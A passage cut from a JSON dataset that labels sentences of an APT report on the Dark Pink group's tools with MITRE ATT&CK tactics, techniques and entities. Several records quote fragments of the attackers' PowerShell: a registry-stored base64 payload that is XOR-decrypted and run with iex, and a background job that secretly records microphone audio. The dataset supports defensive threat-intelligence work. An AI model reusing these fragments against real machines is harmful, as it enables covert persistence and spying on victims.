.NET application to elevate privileges.", "entities": [ { "text": "will be executed", "start": 24, "end": 40, "label": "Action" }, { "text": "PowerShell", "start": 4, "end": 14, "label": "MalwareTool" } ] }, { "uid": "aptnotes-08_aptnotes_report-p17-s178-bfb4ee", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 17, "sentence_id": 178, "context_before": "The PowerShell commands will be executed using the .NET application as a tool for privilege escalation.", "sentence_text": "Tools\nCucky\nCucky is a simple custom stealer developed on .NET.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p17-s179-4514c5", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 17, "sentence_id": 179, "context_before": "Tools\nCucky\nCucky is a simple custom stealer developed on .NET.", "sentence_text": "A variety of samples were found during the investigation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p17-s180-588a91", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 17, "sentence_id": 180, "context_before": "A variety of samples were found during the investigation.", "sentence_text": "The most analyzed versions were packed by Confuser.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p17-s181-a705f7", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 17, "sentence_id": 181, "context_before": "The most analyzed versions were packed by Confuser.", "sentence_text": "It does not communicate with the network, and collected information is saved in the folder %TEMP%\\backuplog.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p17-s182-7e5ae7", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 17, "sentence_id": 182, "context_before": "It does not communicate with the network, and collected information is saved in the folder %TEMP%\\backuplog.", "sentence_text": "Although we do not have any information related to the use of stolen data, we suppose that it can be used to gain access to 17/29", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p18-s182-ad04f2", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 18, "sentence_id": 182, "context_before": "It does not communicate with the network, and collected information is saved in the folder %TEMP%\\backuplog.", "sentence_text": "Although we do not have any information related to the use of stolen data, we suppose that it can be used to gain access to 17/29", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p18-s183-3a7d9d", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 18, "sentence_id": 183, "context_before": "Although we do not have any information related to the use of stolen data, we suppose that it can be used to gain access to 17/29", "sentence_text": "compile a list of organization employees, distribute malicious attachments, and assess whether the compromised machine is real or virtual.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p18-s184-8469f8", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 18, "sentence_id": 184, "context_before": "compile a list of organization employees, distribute malicious attachments, and assess whether the compromised machine is real or virtual.", "sentence_text": "The sample found contained the path below to debug information:\nC:\\Users\\hoang\\source\\repos\\Cucky\\Cucky\\obj\\Release\\net46\\Cucky.pdb\nCtealer\nCtealer is an analog of Cucky but developed on C/C++.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p18-s185-d11ab5", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 18, "sentence_id": 185, "context_before": "The sample found contained the path below to debug information:\nC:\\Users\\hoang\\source\\repos\\Cucky\\Cucky\\obj\\Release\\net46\\Cucky.pdb\nCtealer\nCtealer is an analog of Cucky but developed on C/C++.", "sentence_text": "TelePowerDropper or a special command issued by the threat actors can be used to deploy Ctealer.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p18-s186-0a847b", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 18, "sentence_id": 186, "context_before": "TelePowerDropper or a special command issued by the threat actors can be used to deploy Ctealer.", "sentence_text": "The working process is pretty similar to Cucky as well, as it also saves collected files to the %TEMP%\\backuplog folder.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1074", "name": "Data Staged" } ], "procedure": "Save collected files to a temporary folder.", "entities": [ { "text": "saves collected files to the %TEMP%\\backuplog folder", "start": 67, "end": 119, "label": "Action" }, { "text": "%TEMP%\\backuplog", "start": 96, "end": 112, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p18-s187-301edd", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 18, "sentence_id": 187, "context_before": "The working process is pretty similar to Cucky as well, as it also saves collected files to the %TEMP%\\backuplog folder.", "sentence_text": "The sample found contained the path below to debug information:\nC:\\Users\\build\\source\\repos\\CtealWebCredential\\Release\\CtealWebCredential.pdb\nTelePowerBot\n18/29", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p19-s188-965cbb", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 19, "sentence_id": 188, "context_before": "The sample found contained the path below to debug information:\nC:\\Users\\build\\source\\repos\\CtealWebCredential\\Release\\CtealWebCredential.pdb\nTelePowerBot\n18/29", "sentence_text": "As we have already noted, TelePowerBot will be launched every time a user of an infected machine logs into the system.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547", "name": "Boot or Logon Autostart Execution" } ], "procedure": "Launch TelePowerBot automatically upon user login on infected machines.", "entities": [ { "text": "launched every time a user of an infected machine logs into the system", "start": 47, "end": 117, "label": "Action" }, { "text": "TelePowerBot", "start": 26, "end": 38, "label": "MalwareTool" } ] }, { "uid": "aptnotes-08_aptnotes_report-p19-s189-b90115", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 19, "sentence_id": 189, "context_before": "As we have already noted, TelePowerBot will be launched every time a user of an infected machine logs into the system.", "sentence_text": "When this happens, a special script will be launched.", "relevant": "yes", "tactic": [ { "name": "Execution", "id": "TA0002" } ], "techniques": null, "procedure": "A script is launched during system logon.", "entities": [ { "text": "will be launched", "start": 36, "end": 52, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p19-s190-45952f", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 19, "sentence_id": 190, "context_before": "When this happens, a special script will be launched.", "sentence_text": "The script reads the value of another regkey (e.g HKCU\\SOFTWARE\\Classes\\abcdfile\\shell\\abcd), which begins decryption and launch of TelePowerBot.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1140", "name": "Deobfuscate/Decode Files or Information" }, { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Read registry key to trigger decryption and execute TelePowerBot.", "entities": [ { "text": "reads the value of another regkey (e.g HKCU\\SOFTWARE\\Classes\\abcdfile\\shell\\abcd)", "start": 11, "end": 92, "label": "Action" }, { "text": "begins decryption and launch of TelePowerBot", "start": 100, "end": 144, "label": "Action" }, { "text": "HKCU\\SOFTWARE\\Classes\\abcdfile\\shell\\abcd", "start": 50, "end": 91, "label": "Infrastructure_Indicator" }, { "text": "TelePowerBot", "start": 132, "end": 144, "label": "MalwareTool" } ] }, { "uid": "aptnotes-08_aptnotes_report-p19-s191-96c5a0", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 19, "sentence_id": 191, "context_before": "The script reads the value of another regkey (e.g HKCU\\SOFTWARE\\Classes\\abcdfile\\shell\\abcd), which begins decryption and launch of TelePowerBot.", "sentence_text": "The encryption is based on xor where the key is an array number from 0 to 256.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p19-s192-81b09e", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 19, "sentence_id": 192, "context_before": "The encryption is based on xor where the key is an array number from 0 to 256.", "sentence_text": "Before decryption, the original payload will be decoded from base64.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1140", "name": "Deobfuscate/Decode Files or Information" } ], "procedure": "Decode payload from base64 prior to decryption.", "entities": [ { "text": "decoded from base64", "start": 48, "end": 67, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p19-s193-ae426f", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 19, "sentence_id": 193, "context_before": "Before decryption, the original payload will be decoded from base64.", "sentence_text": "The deobfuscated command example is shown below:\niex(\n[System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p19-s195-7be824", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 19, "sentence_id": 195, "context_before": "Text.", "sentence_text": "Encoding]::UTF8.GetString(\n([System.Convert]::FromBase64String(\n(gp \"HKCU:\\\\SOFTWARE\\\\Classes\\\\abcdfile\\\\shell\" -Name \"abcd\").\"abcd\")", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p19-s196-948614", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 19, "sentence_id": 196, "context_before": "Encoding]::UTF8.GetString(\n([System.Convert]::FromBase64String(\n(gp \"HKCU:\\\\SOFTWARE\\\\Classes\\\\abcdfile\\\\shell\" -Name \"abcd\").\"abcd\")", "sentence_text": "| % -Begin{$i=0} -Process{ $_ = $_ -bxor $i%256;$i++;$_ } )\n)\n)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p19-s197-165eae", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 19, "sentence_id": 197, "context_before": "| % -Begin{$i=0} -Process{ $_ = $_ -bxor $i%256;$i++;$_ } )\n)\n)", "sentence_text": "| iex The decrypted stage is not final.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p19-s198-e504ad", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 19, "sentence_id": 198, "context_before": "| iex The decrypted stage is not final.", "sentence_text": "It is an intermediate stage and also is based on PowerShell and is highly obfuscated.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p19-s199-7ab229", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 19, "sentence_id": 199, "context_before": "It is an intermediate stage and also is based on PowerShell and is highly obfuscated.", "sentence_text": "At this stage, the final script has already been stored in the stager but it is separated into blocks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p19-s200-431fe0", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 19, "sentence_id": 200, "context_before": "At this stage, the final script has already been stored in the stager but it is separated into blocks.", "sentence_text": "This kind of tool communicates with a Telegram channel to receive new tasks from the threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p19-s201-8317b3", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 19, "sentence_id": 201, "context_before": "This kind of tool communicates with a Telegram channel to receive new tasks from the threat actors.", "sentence_text": "The bot can communicate with various infected devices, and the bot checks for new commands every 60 seconds.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Communicate with infected devices and periodically check for new commands.", "entities": [ { "text": "communicate with various infected devices", "start": 12, "end": 53, "label": "Action" }, { "text": "checks for new commands every 60 seconds", "start": 67, "end": 107, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p19-s202-85b1a4", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 19, "sentence_id": 202, "context_before": "The bot can communicate with various infected devices, and the bot checks for new commands every 60 seconds.", "sentence_text": "During execution, the bot works with two register keys: HKCU\\Environment\\Update and HKCU\\Environment\\guid.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p19-s203-06a0c8", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 19, "sentence_id": 203, "context_before": "During execution, the bot works with two register keys: HKCU\\Environment\\Update and HKCU\\Environment\\guid.", "sentence_text": "The first one stores the last message id, which is processed from the Telegram bot (The parameter update_id from Telegram).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p19-s204-eea7d5", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 19, "sentence_id": 204, "context_before": "The first one stores the last message id, which is processed from the Telegram bot (The parameter update_id from Telegram).", "sentence_text": "The second key stores the unique identification of infected machines.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p19-s205-40401d", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 19, "sentence_id": 205, "context_before": "The second key stores the unique identification of infected machines.", "sentence_text": "It is generated by command [guid]::NewGuid() when the bot launches for the first time.", "relevant": "yes", "tactic": [ { "name": "Execution", "id": "TA0002" } ], "techniques": null, "procedure": "A GUID is generated using a command when the bot launches.", "entities": [ { "text": "is generated", "start": 3, "end": 15, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p19-s206-cba7eb", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 19, "sentence_id": 206, "context_before": "It is generated by command [guid]::NewGuid() when the bot launches for the first time.", "sentence_text": "The IP address is also ascertained via a get request to https://ifconfig.me/ip.", "relevant": "yes", "tactic": [ { "name": "Discovery", "id": "TA0007" } ], "techniques": [ { "name": "System Network Configuration Discovery", "id": "T1016" } ], "procedure": "The bot retrieves the system IP address by sending a request to an external service.", "entities": [ { "text": "is also ascertained", "start": 15, "end": 34, "label": "Action" }, { "text": "https://ifconfig.me/ip", "start": 56, "end": 78, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p19-s207-d7b755", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 19, "sentence_id": 207, "context_before": "The IP address is also ascertained via a get request to https://ifconfig.me/ip.", "sentence_text": "These processes are also based on PowerShell commands, and we will dig a little deeper into those later in the report.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p19-s208-a4c5a3", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 19, "sentence_id": 208, "context_before": "These processes are also based on PowerShell commands, and we will dig a little deeper into those later in the report.", "sentence_text": "The bot implementation is shown in APPENDIX A.\nSome variants of this module contain additional functionality for ensuring lateral movement.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p19-s209-78919f", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 19, "sentence_id": 209, "context_before": "The bot implementation is shown in APPENDIX A.\nSome variants of this module contain additional functionality for ensuring lateral movement.", "sentence_text": "All other functionalities are the same.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p19-s210-75c6ef", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 19, "sentence_id": 210, "context_before": "All other functionalities are the same.", "sentence_text": "In cases that Group-IB analyzed, the Telegram parameter can either be hardcoded in the scripts or read from the registry key.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p20-s212-ff965f", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 20, "sentence_id": 212, "context_before": "KamiKakaBot\n19/29", "sentence_text": "KamiKakaBot is the .NET version of TelePowerBot, and we found very few differences between the pair of them.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p20-s213-b80d79", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 20, "sentence_id": 213, "context_before": "KamiKakaBot is the .NET version of TelePowerBot, and we found very few differences between the pair of them.", "sentence_text": "It is able to update itself and once it receives commands, it can pass an argument to the cmd.exe process.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "Execute commands by passing arguments to cmd.exe after receiving instructions.", "entities": [ { "text": "update itself", "start": 14, "end": 27, "label": "Action" }, { "text": "receives commands", "start": 40, "end": 57, "label": "Action" }, { "text": "pass an argument to the cmd.exe process", "start": 66, "end": 105, "label": "Action" }, { "text": "cmd.exe", "start": 90, "end": 97, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p20-s214-496ddf", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 20, "sentence_id": 214, "context_before": "It is able to update itself and once it receives commands, it can pass an argument to the cmd.exe process.", "sentence_text": "PowerSploit/Get-MicrophoneAudio", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p20-s215-139a03", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 20, "sentence_id": 215, "context_before": "PowerSploit/Get-MicrophoneAudio", "sentence_text": "As we have noted above, the threat actors behind Dark Pink almost exclusively leveraged custom made tools.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p20-s216-8cb60b", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 20, "sentence_id": 216, "context_before": "As we have noted above, the threat actors behind Dark Pink almost exclusively leveraged custom made tools.", "sentence_text": "This is loaded onto the victim’s machine via download from Github.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Load payload onto victim machine by downloading it from GitHub.", "entities": [ { "text": "loaded onto the victim’s machine via download from Github", "start": 8, "end": 65, "label": "Action" }, { "text": "Github", "start": 59, "end": 65, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p20-s217-8304e8", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 20, "sentence_id": 217, "context_before": "This is loaded onto the victim’s machine via download from Github.", "sentence_text": "Group-IB researchers found that antivirus software on victim machines blocked this process when the threat actors attempted to launch the module.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Attempt to launch a module on victim machines but execution is blocked by antivirus software.", "entities": [ { "text": "the threat actors", "start": 96, "end": 113, "label": "ThreatActor" }, { "text": "attempted to launch the module", "start": 114, "end": 144, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p20-s218-08d707", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 20, "sentence_id": 218, "context_before": "Group-IB researchers found that antivirus software on victim machines blocked this process when the threat actors attempted to launch the module.", "sentence_text": "We found that the threat actors attempted to obfuscate the original PowerSploit module to make it undetectable, and these were unsuccessful.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Attempt to obfuscate PowerSploit module to evade detection.", "entities": [ { "text": "the threat actors", "start": 14, "end": 31, "label": "ThreatActor" }, { "text": "attempted to obfuscate the original PowerSploit module to make it undetectable", "start": 32, "end": 110, "label": "Action" }, { "text": "PowerSploit", "start": 68, "end": 79, "label": "MalwareTool" } ] }, { "uid": "aptnotes-08_aptnotes_report-p20-s219-e32a22", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 20, "sentence_id": 219, "context_before": "We found that the threat actors attempted to obfuscate the original PowerSploit module to make it undetectable, and these were unsuccessful.", "sentence_text": "As a result, the threat actors returned to the drawing board and added a script (below) that was successfully able to record the microphone audio on infected devices.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1123", "name": "Audio Capture" } ], "procedure": "Add a script to record microphone audio from infected devices.", "entities": [ { "text": "the threat actors", "start": 13, "end": 30, "label": "ThreatActor" }, { "text": "added a script (below) that was successfully able to record the microphone audio on infected devices", "start": 65, "end": 165, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p20-s220-9fd43b", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 20, "sentence_id": 220, "context_before": "As a result, the threat actors returned to the drawing board and added a script (below) that was successfully able to record the microphone audio on infected devices.", "sentence_text": "Start-Job {\nwhile(1){\nps psr -erroraction 'silentlycontinue' | kill -force;sleep 30;\nni \"$($env:tmp)\\\\record\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p20-s221-75b485", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 20, "sentence_id": 221, "context_before": "Start-Job {\nwhile(1){\nps psr -erroraction 'silentlycontinue' | kill -force;sleep 30;\nni \"$($env:tmp)\\\\record\"", "sentence_text": "-ItemType Directory -erroraction 'silentlycontinue';\nstart psr -ArgumentList", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p20-s222-dfe4bb", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 20, "sentence_id": 222, "context_before": "-ItemType Directory -erroraction 'silentlycontinue';\nstart psr -ArgumentList", "sentence_text": "\"/stop\" } } This simple script launches a background task that triggers a standard utility PSR to capture sound every minute.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1123", "name": "Audio Capture" } ], "procedure": "Capture audio from the system using PSR utility at regular intervals.", "entities": [ { "text": "launches a background task that triggers a standard utility PSR to capture sound every minute", "start": 31, "end": 124, "label": "Action" }, { "text": "PSR", "start": 91, "end": 94, "label": "MalwareTool" } ] }, { "uid": "aptnotes-08_aptnotes_report-p20-s223-6e69a3", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 20, "sentence_id": 223, "context_before": "\"/stop\" } } This simple script launches a background task that triggers a standard utility PSR to capture sound every minute.", "sentence_text": "The recorded audio files will be saved inside a ZIP archive that is located in a temporary folder (%TEMP%\\record).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p20-s224-0eaa33", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 20, "sentence_id": 224, "context_before": "The recorded audio files will be saved inside a ZIP archive that is located in a temporary folder (%TEMP%\\record).", "sentence_text": "The files are named according to the following 20/29", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p21-s225-b19303", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 21, "sentence_id": 225, "context_before": "The files are named according to the following 20/29", "sentence_text": "template: ‘yyyyMMddHHmmss’.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p21-s226-304717", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 21, "sentence_id": 226, "context_before": "template: ‘yyyyMMddHHmmss’.", "sentence_text": "These audio files are then exfiltrated with a separate script that sends them (as a ZIP archive), to the threat actors’ Telegram bot.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Exfiltrate audio files via a script that sends them as a ZIP archive to a Telegram bot.", "entities": [ { "text": "exfiltrated with a separate script that sends them (as a ZIP archive), to the threat actors’ Telegram bot", "start": 27, "end": 132, "label": "Action" }, { "text": "Telegram bot", "start": 120, "end": 132, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p21-s227-f17f5e", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 21, "sentence_id": 227, "context_before": "These audio files are then exfiltrated with a separate script that sends them (as a ZIP archive), to the threat actors’ Telegram bot.", "sentence_text": "ZMsg (Messenger exfiltration)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p21-s228-844e5c", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 21, "sentence_id": 228, "context_before": "ZMsg (Messenger exfiltration)", "sentence_text": "The threat actors are also interested in stealing data from messengers on infected devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p21-s229-bc5a1c", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 21, "sentence_id": 229, "context_before": "The threat actors are also interested in stealing data from messengers on infected devices.", "sentence_text": "We are still doing work to assess what the threat actors are able to draw from Telegram accounts on infected devices, but the case of Zalo is one that piqued our interest.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p21-s230-05531a", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 21, "sentence_id": 230, "context_before": "We are still doing work to assess what the threat actors are able to draw from Telegram accounts on infected devices, but the case of Zalo is one that piqued our interest.", "sentence_text": "FlaUI is a library that assists with the automatic UI testing of Windows applications, with the entry point usually an application or the desktop to generate an automation element.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p21-s231-5b0720", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 21, "sentence_id": 231, "context_before": "FlaUI is a library that assists with the automatic UI testing of Windows applications, with the entry point usually an application or the desktop to generate an automation element.", "sentence_text": "Through this, it is possible to analyze sub-elements and interact with them.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p21-s232-b9bc6c", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 21, "sentence_id": 232, "context_before": "Through this, it is possible to analyze sub-elements and interact with them.", "sentence_text": "ZMsg iterates elements on Windows applications to discover those with particular names.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1010", "name": "Application Window Discovery" } ], "procedure": "Iterate application elements to discover specific named components.", "entities": [ { "text": "ZMsg", "start": 0, "end": 4, "label": "MalwareTool" }, { "text": "iterates elements on Windows applications to discover those with particular names", "start": 5, "end": 86, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p21-s233-dcb92e", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 21, "sentence_id": 233, "context_before": "ZMsg iterates elements on Windows applications to discover those with particular names.", "sentence_text": "For example, the element with messages has the name “messageView”.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p21-s234-96f221", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 21, "sentence_id": 234, "context_before": "For example, the element with messages has the name “messageView”.", "sentence_text": "All collected information is stored in the %TEMP%\\KoVosRLvmU\\ folder in files with the .dat and .bin extensions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p21-s235-8bc208", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 21, "sentence_id": 235, "context_before": "All collected information is stored in the %TEMP%\\KoVosRLvmU\\ folder in files with the .dat and .bin extensions.", "sentence_text": "File names are created as an encoded hex string, and are generated in accordance with the below template:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p21-s236-1ddf9b", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 21, "sentence_id": 236, "context_before": "File names are created as an encoded hex string, and are generated in accordance with the below template:", "sentence_text": "Tasks can also be issued to all infected devices simultaneously.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p21-s237-eda7a2", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 21, "sentence_id": 237, "context_before": "Tasks can also be issued to all infected devices simultaneously.", "sentence_text": "During our examination, we noticed several different kinds of commands.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p21-s238-4e12ae", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 21, "sentence_id": 238, "context_before": "During our examination, we noticed several different kinds of commands.", "sentence_text": "The functionalities of some of these commands overlap, but they are based on PowerShell commands.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p21-s239-48597e", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 21, "sentence_id": 239, "context_before": "The functionalities of some of these commands overlap, but they are based on PowerShell commands.", "sentence_text": "If network disk usage is found, they will begin exploring this disk to find files that may be of interest to them and potentially exfiltrate them.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1083", "name": "File and Directory Discovery" }, { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Explore network disk to identify files of interest and exfiltrate them.", "entities": [ { "text": "exploring this disk to find files that may be of interest to them and potentially exfiltrate them", "start": 48, "end": 145, "label": "Action" }, { "text": "network disk", 